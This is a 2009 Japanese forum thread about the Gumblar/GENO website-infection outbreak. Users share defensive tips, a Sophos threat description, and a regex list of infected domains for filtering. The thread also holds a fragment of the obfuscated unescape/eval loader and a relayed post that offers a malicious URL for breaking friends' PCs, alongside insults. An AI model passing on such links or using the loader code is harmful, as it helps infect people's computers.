ヒサカキ(東京都) :2009/05/18(月) 00:57:07.95 ID:qH+pRkPf
825 :
マムシグサ(岡山県) :2009/05/18(月) 00:57:19.81 ID:uKaX8zMq
>>817 よかったな
お祝いに今度zipやるから会社で落としてくれ
827 :
オウバイ(大阪府) :2009/05/18(月) 00:58:14.83 ID:ker7VPvN
知らんけどwikiのIPは実行ファイルを送りつけてくるとこじゃないの
JavaScriptとかこの世から消滅しろよ〜
830 :
オランダミミナグサ(東京都) :2009/05/18(月) 00:59:12.45 ID:0LOIUa0M
>>825 あれからZIPは落としてないw
つうかHDDも全部処分した
結構本気で反省したわ
vistaの奴はもう寝ろ。
俺毎回ウイルススレ見つけると焦るんだけど 良く考えたらそんなにもれて困るデータもないし クレジットカードも使ってないし ハゲるわ〜
836 :
ギシギシ :2009/05/18(月) 01:01:26.25 ID:t9HYlcXp
>>830 そのままニートになって死ねばよかったのに
837 :
桜(福岡県) :2009/05/18(月) 01:01:47.58 ID:K80uLwbM
>>830 処分する前に公開鯖立てて欲しかったな。
とりあえずFP最新版にしてNoScript入れてフラッシュ切った
839 :
シンフィアンドラ・ワンネリ(愛知県) :2009/05/18(月) 01:03:21.98 ID:HZPNuQKm
840 :
オランダミミナグサ(東京都) :2009/05/18(月) 01:03:38.38 ID:0LOIUa0M
何とでも言え 悪いのは自分だ
とりあえず会社のFTPのパスワードだけ変更しておいたぜ システム担当者として明日以降が思いやられるわマジで・・・
とりあえず家のPCは全部入ってるアドビアップデートさせた
こうやって強くなっていくんだな
怖くてメールチェックできない(´・ω・`) でもチェックしないと大量に(´・ω・`)
家族用のPCのXPのやつに対策してみたけど、父親とか何もわからずに実行しそうで怖いわw アドミニストレータ権限なくせば万全かしら?
特定のサイトだけFLASHとかJSとかオンにでききるような設定とかできないののの?
847 :
ヒサカキ(東京都) :2009/05/18(月) 01:05:49.97 ID:qH+pRkPf
ほう、経験が生きたな
848 :
ケンタウレア・モンタナ(福岡県) :2009/05/18(月) 01:05:55.73 ID:Rd0s9LV8
849 :
スズメノヤリ(福井県) :2009/05/18(月) 01:07:05.12 ID:/B8NQEWs
Operaに続いてVistaが最強伝説を確立してしまったのか
850 :
ポレオニウム・ボレアレ(コネチカット州) :2009/05/18(月) 01:07:12.84 ID:tFVgFEbp
二次元も三次元もパンデミックでござる の巻
>>846 IEなら信頼済みサイトとかに割り振ればレベルによってActiveX切ったり出来る
FirefoxならNoScriptとかでサイトごとに切れる
ただし全面停止推奨だな今は
次訪問したときに感染してないとは限らないのが恐ろしい
852 :
ニガナ(東京都) :2009/05/18(月) 01:07:53.31 ID:zpP0Syph
>>846 それが手軽に出来るのがOpera。最近悪さして話題になったNoScript使いたいのならFirefox
どうぞ御自由に
三次元のパンデミックのほうも府庁からお知らせが来るんだろうな
成美堂踏んじゃったけど50.727バイトって出たから大丈夫?
くだらないデマだがやり口が悪質
Troj/JSRedir-R is a malicious script likely to have been injected into a defaced web page to load remote malicious content when the page is viewed. Analysis of many defaced sites has shown that many examples of Troj/JSRedi-R are buggy and do not work. Websites affected with Troj/JSRedir-R may also see detections of Troj/PHPMod-A. Working copies of Troj/JSRedir-R will redirect users to a Chinese Domain (hosted in Russia) and then via a series of PDF and SWF exploits attempt to install malware detected as Troj/Daonol-Fam. For more information on this threat see the SophosLabs Blog. www.sophos.com/security/analyses/viruses-and-spyware/trojjsredirr.html
858 :
ニガナ(東京都) :2009/05/18(月) 01:11:15.20 ID:zpP0Syph
VistaUserはもうあんま関係ないからあらしと咲見て寝ようぜw
860 :
ニリンソウ(dion軍) :2009/05/18(月) 01:11:28.21 ID:nOBa9mCf
同人板ってだいぶ前からウィルス攻撃されてたろ あれも作った奴が少しずつ改良して運営と住人の対策無効化してたよなあ そんで今回のは自分で勝手に改良して進化いくわけか 災難だな同人
861 :
シラネアオイ(コネチカット州) :2009/05/18(月) 01:11:31.15 ID:wBbFbW02
もう再起動出来たしいいや寝る
java切るわけにはいかないんでFLASHとAdobe reader無効にしてる 不便すぎる
まとめサイトが感染したらどうなるんだろう
やっぱシルバーライト最強だな。
寝る前の最終チェック 1.avastのインスコとwebスキャナの有効化 2.adobe製品を使わない。使うなら最新版を。 adobe reader 9.1.1 flash player 10.0.22.87 3.Foxitreader 等PDFreaderはjavascriptでの操作は不可に 4.IE8に乗り換え 5.全ブラウザでjavascript・activeXの実行不可 で、大丈夫だよな あとは明日Gumblar 関連のIPブロック設定して、VMでUbuntu入れて終了 寝る。寝るったら寝る。
ママンにMacbookでも買ってやるか
UACって何?
870 :
オンシジューム(千葉県) :2009/05/18(月) 01:19:17.79 ID:rvMjgXyT
携帯がハイテクになればなるほど 感染力と症状が尋常じゃないウイルスが いずれ携帯にも現れるんだろうなと思うと怖いですね
GENOCIDEウィルス?
872 :
シラン(東海) :2009/05/18(月) 01:20:47.01 ID:CM/0J2La
これってmeたんでも感染すんの?
874 :
ニガナ(東京都) :2009/05/18(月) 01:21:35.08 ID:zpP0Syph
875 :
ポピー(コネチカット州) :2009/05/18(月) 01:22:25.39 ID:hBFhb07P
亜種の話広めとかないとヤバくないか? つか止められなくないかコレ
>>874 ニフティって感染してるって書き込みみたけど
デマかw
879 :
オウバイ(岩手県) :2009/05/18(月) 01:25:00.40 ID:Qm4ljfcC
>>877 煽りたい気分は分かるが余計なURLは張るな
>878 >115嫁
こっちのウィルスも怖いが 大阪に通勤してるからインフルもこえーな
Vista の UAC (ユーザーアカウント制御) Java スクリプトやactive Xなどを実行しようとすると 「あなたの許可が必要です」と警告してくる) が有効であれば、 (不用意に 「続行」 ボタン押さなければ) 感染しにくい GENOウイルス Temporary フォルダにウィルス本体 (Java スクリプト) をダウンロードし、 Adobe Reader や Flash Player のバッファオーバーフローの脆弱性を利用して 当該スクリプトを実行することにより、ウィルスに感染させるらしい。
883 :
キュウリグサ(東京都) :2009/05/18(月) 01:30:51.66 ID:CE4W0X3a
バッファオーバーランとはすごいな しかし、comodo memory firewallを入れている俺に死角はなかった
>>877 今晩のカレーが不味かったから、明日からはウンコを食えって言われてもなあw
886 :
ムラサキサギゴケ(東日本) :2009/05/18(月) 01:32:47.43 ID:zeXJv1Lw
通ぶってわざわざXPにダウングレードした素人に正義の鉄鎚wwww
>>886 わざわざXPにダウングレードしたような情強はAdobeのアップデートもしてるだろw
そういう事も判らないからVista厨は情弱って言われるんだよwww
891 :
アッツザクラ(大阪府) :2009/05/18(月) 01:35:41.75 ID:+CL0K4hO
>>886 あれはマジで情弱というかなんかの意地だろうなw
microsoftと闘ってるという自意識でもあんのかな
892 :
スズメノヤリ(不明なsoftbank) :2009/05/18(月) 01:35:47.92 ID:g0rWbT+i
>>886 わざわざセキュリティの高いVISTAを蹴ってXP(笑)にダウングレードする企業もたいしたもんだよな
Vistaカス今までの雪辱を晴らそうと必死で大暴れ(笑)
最低の情弱はVista買った上に管理者権限常用でUAC切ってる奴
895 :
シラネアオイ(コネチカット州) :2009/05/18(月) 01:35:50.32 ID:RhxFgQt9
もしかしてルータの電源をひっこ抜いとけば感染しないんじゃね?
win使ってるくせに負け組ざまあwwwwwwwwwwww
897 :
スズメノヤリ(関西地方) :2009/05/18(月) 01:36:53.69 ID:ZPzpcvwA
対策無しで安全なVista かたや穴だらけのゴミカスOS Xp
アマゾンのアドレスがなんで長くなるのか情強の人の解説希望 E3と83が大杉だけどなんの意味あるんだ?
つまり VISTA=情弱専用
900 :
ケンタウレア・モンタナ(福岡県) :2009/05/18(月) 01:38:19.23 ID:Rd0s9LV8
>>895 ビクッ
いちいち確認出てくるの面倒なんだもん
902 :
水芭蕉(dion軍) :2009/05/18(月) 01:39:35.38 ID:ayChtY8G BE:966917838-BRZ(10006)
どうでもいいが今日教習所での応急救護のとき
心臓マッサージする人形が俺と同じユニクロの服きててきまずかった。
905 :
スズメノヤリ(千葉県) :2009/05/18(月) 01:46:47.95 ID:9aJIFlRP
XPで仮想PCの中のうぶんちゅからこのスレに書き込んでる俺から見たらかなり笑えるよこのスレ
906 :
トキワヒメハギミツバアケビ(アラバマ州) :2009/05/18(月) 01:46:53.11 ID:ff/Zud9j
リカバリ大変だったから感染したくないでもう さっさと駆除できるようにしてくれ あとadobeはくそ過ぎる
>>905 うぶんちゅってlinux系だっけ?うろおぼえw
linuxの練習台くらいには使えるんだろうか、とか妄想
909 :
シンビジューム(東海) :2009/05/18(月) 01:49:16.96 ID:4kLLEuqo
910 :
ケンタウレア・モンタナ(福岡県) :2009/05/18(月) 01:50:09.82 ID:Rd0s9LV8
628 名前:名無しさん@明日があるさ[] 投稿日:2009/05/18(月) 01:24:17 O どうでもいいが今日教習所での応急救護のとき 心臓マッサージする人形が俺と同じユニクロの服きててきまずかった。
911 :
アッツザクラ(大阪府) :2009/05/18(月) 01:50:14.31 ID:+CL0K4hO
自称情強さんはwin自動更新とかUAC切っちゃったりする割に アンチウイルスソフトにだけは拘ってantivirとか入れてたりするのから困る
912 :
プリムラ・インボルクラータ(千葉県) :2009/05/18(月) 01:50:36.22 ID:DD4Zgjte
うんこつぶ♪
>904 つ 良解答20ポイント
914 :
スズメノヤリ(静岡県) :2009/05/18(月) 01:55:50.04 ID:II7qfJLl
ノートン先生をうpでーとしとけばおk?
915 :
ムラサキサギゴケ(東日本) :2009/05/18(月) 01:56:17.38 ID:zeXJv1Lw
ウイルスにやられたXP厨の悲鳴が心地よいww
916 :
イヌノフグリ(アラバマ州) :2009/05/18(月) 01:57:09.88 ID:Za2w/yhp
917 :
ガーベラ(大阪府) :2009/05/18(月) 01:58:24.09 ID:8Dk4dMgE
>>914 テスト機で調べてみたけど無理っぽい。
なんかやっかいなウイルスですな。
⊂( ゚д゚ ) ゲ゙ホッゲノホッ ヽ ⊂ ) (⌒)| ダッ 三 `J / O | ̄| O ヽ | / | | ゲノッゲノGッホ ヽ、. ├ー┤ ノ ゲホホッGENOッ
920 :
姫カンムリシャジン(石川県) :2009/05/18(月) 01:59:06.90 ID:DSuVx5x2
XPの悲鳴で今日も飯がウマい!
みんなもうふつうにネトサフィしてるの?
922 :
ヒヨクヒバ(東京都) :2009/05/18(月) 01:59:40.96 ID:bCpcIx63
いまからオナニーしようと思うんだけど 有名所エロサイトでやばいところってどこ?
924 :
オオヤマオダマキ(千葉県) :2009/05/18(月) 02:00:02.16 ID:7zP6/DJU
vista土壇場の大逆転で またもや俺らν速民大勝利だな
>>898 /dqより前の部分を削っても同じ内容が表示される
コピペするときはそっちを使うほうがいい
Vistaカス今までの雪辱を晴らそうと必死で大暴れ(笑)
927 :
ダリア(catv?) :2009/05/18(月) 02:01:37.82 ID:lAeHMeor
afi2000\.web\.fc2\.com crestronjapan\.com expss\.main\.jp/expss2/2005/01 geno\.co\.jp geno-web\.jp hobbycomplex\.com joyjoynet\.com juicyrock\.co\.jp k-q-bury\.com livmail\.com mag-puppine\.com naxos\.co\.jp nifty-hair\.com odn\.ne\.jp/revue1999 p-frying\.com rakuten.ne.jp/gold/i-na skyhighpremium\.com sound.jp/yudai_marimba thesis-report\.com ti-a-ra\.com zengozen\.co\.jp これ以外の感染URLの一覧載ってるサイトとかしらない? NGExに入れときたいんだけど
なになに ここに来てvistaが大勝利したのか
929 :
ノウルシ(アラバマ州) :2009/05/18(月) 02:01:49.87 ID:JsCePAFB
>>921 しない
俺は臆病だから今日までこの戦場で生き残ってこられた
>925 お前も良い奴だな 宝くじ4等ぐらい当たると思うよ
931 :
藤(東京都) :2009/05/18(月) 02:03:58.08 ID:wm9wbCe2
Linuxでよかった
>927 無修正DVDの大手っぽいところが感染してるなw 被害者多そうだ \(^o^)/
933 :
ムラサキサギゴケ(東日本) :2009/05/18(月) 02:05:03.95 ID:zeXJv1Lw
XP厨(笑)もっと喚け 上から見下ろす地獄絵図は爽快だ
avastのクイックスキャンしてたらブルースクリーンなったんだがwwwwwwww
N速菌が伝染るから寄ってくんなよおまえら
936 :
カキドオシ(岡山県) :2009/05/18(月) 02:06:11.17 ID:wu2fVTfQ
>>921 vistaならリボンマジック見に行っても成美堂見に行っても全然へーきだった
νista大勝利!
FC2感染してるってことはFC2会員全滅ってこと?
938 :
ボケ(アラバマ州) :2009/05/18(月) 02:06:36.41 ID:wHiZnnTH
いや、これ、『何処のサイトが感染してるか分からない』ってのは怖いねえ XPで自動通知もないアドベの更新してなければ、サイトを開いた瞬間アウトってww ところで、本当にアドベ経由だけかぁ?
ごしゅじんさま、いままで、とてもたのしかたです。 よくういるすにかんせんしてしておこられたけど、やくにたたなで、ごめんなさい。 ごしゅじんさまが、いれるよていの、びすたはあたしのいもおとです。 いもおとだけど、あたしみたいに、やくたたずではありません。 すなおなこで、からだもじょうぶです。 すたいるもいいから、ほんとはちょっと、くやしいです、 いもとを、かわいがってもらえると。おねえさんとして、うれしいです。 いままでつかえないこで、・ごめんなさい.. そして、つかってくれて、ありがとおゴザいました。 あたしは、もう、きえちゃうけれど¥、さいごに、おねがいがあります。きいてくれると、うれしいです。 ごしゅじんさまの、もっている、えくすぴーのディすく、すてないでください。 あたしが、はいっています。いまのあたしじゃ、ないけど、あたしです。 どきどきみたり、さわったり。、してくれるとうれしいです。 ごしゅじんさまにあえて、えむいは、 しあわS
940 :
タツタソウ(静岡県) :2009/05/18(月) 02:07:53.63 ID:eEziWn+k
Linuxって難しいんだろ? タダなんだっけ
vista大勝利もなにも元から叩いてたのって低スペックの嫉妬に踊らされてた情弱だけじゃないか
未だにMeなんて使ってる奴は病気としか思えん。
Windows Updateにアクセスできねえ \(^o^)/
945 :
ハボタン(奈良県) :2009/05/18(月) 02:09:25.92 ID:efBboyxK
スレタイ半角やめろよ。検索引っかからないだろ
946 :
ヒヨクヒバ(東京都) :2009/05/18(月) 02:09:29.33 ID:bCpcIx63
yourfilehostもアウトじゃどうしようもねーわ
947 :
カキドオシ(岡山県) :2009/05/18(月) 02:09:54.25 ID:wu2fVTfQ
98SEなので大丈夫です
数日前からえらい重かったのはこれだったのか?? やばい。つかねる。
950 :
藤(東京都) :2009/05/18(月) 02:13:20.44 ID:wm9wbCe2
>>940 難しいけど、触らなきゃ始まらないと思う。
951 :
サポナリア(アラバマ州) :2009/05/18(月) 02:13:39.45 ID:XJc8zKFM
239 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2009/05/18(月) 02:12:44.09 ID:mr3CIm+w0 バガボンドで武蔵に興味持って五輪の書読もうと思ったらコレだよ糞が tp://www.geocities.jp/themusasi2/ 危険度1000% 超絶危険なURLです。友人のPCを壊すのに利用しましょう! 絶対に踏んではいけません。
ていうかC:¥windowsがない…??
>>951 >replace(QW73,xzGAd);var vaCRk=unescape(z2oY);eval(vaCRk)})(/\~/g)
ああ、ありますね確かに
avast入れて アドビのリーダーとフラッシュ最新にした これでOK?
956 :
スズメノヤリ(東京都) :2009/05/18(月) 02:21:26.28 ID:s+nyZ3fG
XPで擬似UAC環境構築できた!これで勝つる!
960 :
キエビネ(大阪府) :2009/05/18(月) 02:24:52.48 ID:GU8ASW3z
961 :
ハボタン(奈良県) :2009/05/18(月) 02:25:43.81 ID:efBboyxK
_____ |\ ◎-----、\ 人人人人人人人人人人人人人人人人人人人人人人人人人人人人人 | \丶-----ヽ\ < すごい一斗缶を感じる。今までにない何か便利な一斗缶を。 > | | ̄ ̄ ̄ ̄|< 形状・・・なんだろう定められている日本工業規格(JIS規格)に。 > | //| \ / | < 天板、地板は一辺の長さが238.0±2.0mm、高さは349.0±2.0mm、 > | | (゚)=(゚) |< 質量は1140±60g、容量は19.25±0.45リットルと定められている。 > | | ●_● |< 規格の大元は、一斗=十升(約18.039リットル)を基準に考案されている。> | | | < 5ガロン缶とも呼ばれていた時期もある。(1ガロン = 3.7854118リットル) > \ | 〃----ヾ | < 5ガロンと18リットルで、5月18日は18リットル缶の日だよ。 > \|____| YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
962 :
トウゴクシソバタツナミ(鳥取県) :2009/05/18(月) 02:26:07.68 ID:K0VF4NPH
adobe readerのjavascriptきったぉ
vistaだしJava切ってるけど怖くて眠れない
やったー感染してたよー \(^o^)/ Pen4のせいでリカバリ出来ん
>>957 XPだけどアドビ系最新だしノースクリプト入れてるし大丈夫
ノースクリプトは間違ってブラクラ開いちゃった時とかにも効力発揮するし便利
>>960 Vistaで余裕です(^^)
いつでもレタス
常識を覆す栽培方法方法で、四季を通して栽培出来ます、室内の栽培にも対応します。
土を使わないで清潔、早期、多収穫が期待出来ます、冬のレタス栽培は得意とします。
970 :
バラ(東日本) :2009/05/18(月) 02:32:52.07 ID:ZKzGqHKR
971 :
ヤエザクラ(関西地方) :2009/05/18(月) 02:34:59.99 ID:W8ANipOH
973 :
オランダミミナグサ(神奈川県) :2009/05/18(月) 02:36:25.86 ID:Hbuxqfsh
プニルやIEでもjavascript+ActiveXをoffっときゃ無問題でしょ?
>>960 危険度209%
かなり危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
まあ、レタスの人はPCとかネット苦手だけど必死になんとかやってるって感じだもんなw
いつ改竄されててもおかしくないレベル。
_________ / ̄ ̄ ̄\ __________ \ なら / ./ あなたのi, ヽ リカバリディスクは / \ 安心だ!/ n | PCは感染 | y \ 作ってある?/ \ / <―――― .'i,している? /─┐ \ / \/ \___/ └──> \ / . \/ / | /y .| _________ |/ . | \さっさとリカバリ/  ̄ . | \ しろ / | n \ / . | \/ ヽ|/ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ | GENOウィルスと共に | | 過ごすPCライフ | priceless / \_________/ / | |/ . | 旦那に新しいPCを買ってもらう  ̄ ヽ|/ / ̄ ̄ ̄ ̄ ̄ ̄\ . | ̄ ̄ ̄ ̄ ̄ ̄ ̄\ | VIPでやれ | | 鬼女でやれ | \______/ .|_______/
フリーソフトでOSイメージをDVDに焼けるようなソフトないですかね
ソフトウェア板行け
>>969 まとめどうり
osが不安定になったりはしてない
意味ないけどWindowsアップデートは出来た
やっと削除出来た
>>976 本当にソフトウェア板に質問しに行ったろw
>>943 なんかのマルウェアにやられてるな
間違いなく
ν速公認ベンチマークサイトまでもがw
983 :
ジギタリス(dion軍) :2009/05/18(月) 02:48:10.47 ID:BNJP1b0S
XP厨の悲鳴でメシが旨い
984 :
シラー・カンパヌラータ(コネチカット州) :2009/05/18(月) 02:48:27.44 ID:6B4OT9am
軽いかどうかだけでOS選んでたニュー速民w たいしたことねーな
今日にはニコニコのサイトが感染とかになったりして
987 :
モモイロヒルザツキミソウ(香川県) :2009/05/18(月) 02:56:08.02 ID:TACx4C8/
>>1 >javascript切っていても感染のするとの事
ウソクソ情報
■javascriptを切ってても感染する(5/17現在)
今の時点ではウソだが将来的に、pdf or swfをjavascript経由せずに直接読み込ませるタイプのものが出てきたらアウト
とにかく↓のアドビ関連のアップデートを怠らないこと。
988 :
アブラチャン(静岡県) :2009/05/18(月) 02:56:50.28 ID:iqYqaMgK
os Vista サイズ 49.5 KB (50,727 バイト) ディスク上 52.0 KB (53,248 バイト) 作成日時 2006年11月3日0:55:20 更新日時 2006年11月3日0:55:20 今から電源切って寝る
vistaもやばい亜種が出たってマジ?
aviraとavast一緒に使ってみてるんだがavastのアンチウイルスやるとavira先生が大激怒するんだがww
>>978 情報さんくす
感染確かめる方法はまとめので確かなんだね
>>986 涙目動画に名前変えないといけなくなるな
マイコンで右クリすると7割くらいの確立で固まる スペックが低いわけじゃないのに
>>993 感染してたら感染した心当たりのサイト報告
4 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2009/05/18(月) 01:01:39.74 ID:GoatvS/D0
感染チェックツール(暫定最終)
ttp://3rd.geocities.jp/tdnskbn/dat/genochecker.zip 機能
1 ) cmd.exeの起動確認→このツールが起動しない場合はcmd.exeが壊れています
2 ) regedit.exeの起動確認(任意)→UACが出る場合は許可して、起動するのを見届けてください。起動しなければ壊れてます。
3 ) sqlsodbc.chmのファイルサイズ確認→結果がレポートされます。
不安ならテキストエディタで開いてソース読んでから実行してちょうだい。
2000/XP/Vista+7を自動判別して、それぞれに対応したメニューでsqlsodbc.chmを探して
ファイルサイズが正常かどうかチェックします。
めんどくさいから自分のとこに置くようにした。以後は最新版が常にこのURLから取れるようにしておきます。
dotup+番号だと偽物と区別がつきにくいのと、いちいちURL直すのが煩雑で伝わりづらいからです。
batは鯖の設定で置けないんでzipで固めてあります。必要に応じてreadme.txtなんかを追加するかも知れません。
あと万が一私が感染していたとしても、これはHTMLでないのでGENOのコードは埋め込まれません。
>>993 マイコンならメモリ1MBとかか?
そりゃ灰スペックだw
マイコンというよりexplorer関係だわ デスクトップやタスクトレイでも固まる
998 :
オオイヌノフグリ(東京都) :2009/05/18(月) 03:15:29.80 ID:g5vCwtCZ
梅
999 :
オオイヌノフグリ(東京都) :2009/05/18(月) 03:16:16.08 ID:g5vCwtCZ
梅
1000 :
ムラサキサギゴケ(東日本) :2009/05/18(月) 03:16:17.95 ID:zeXJv1Lw
1000ならXP厨完全敗北
1001 :
1001 :
Over 1000 Thread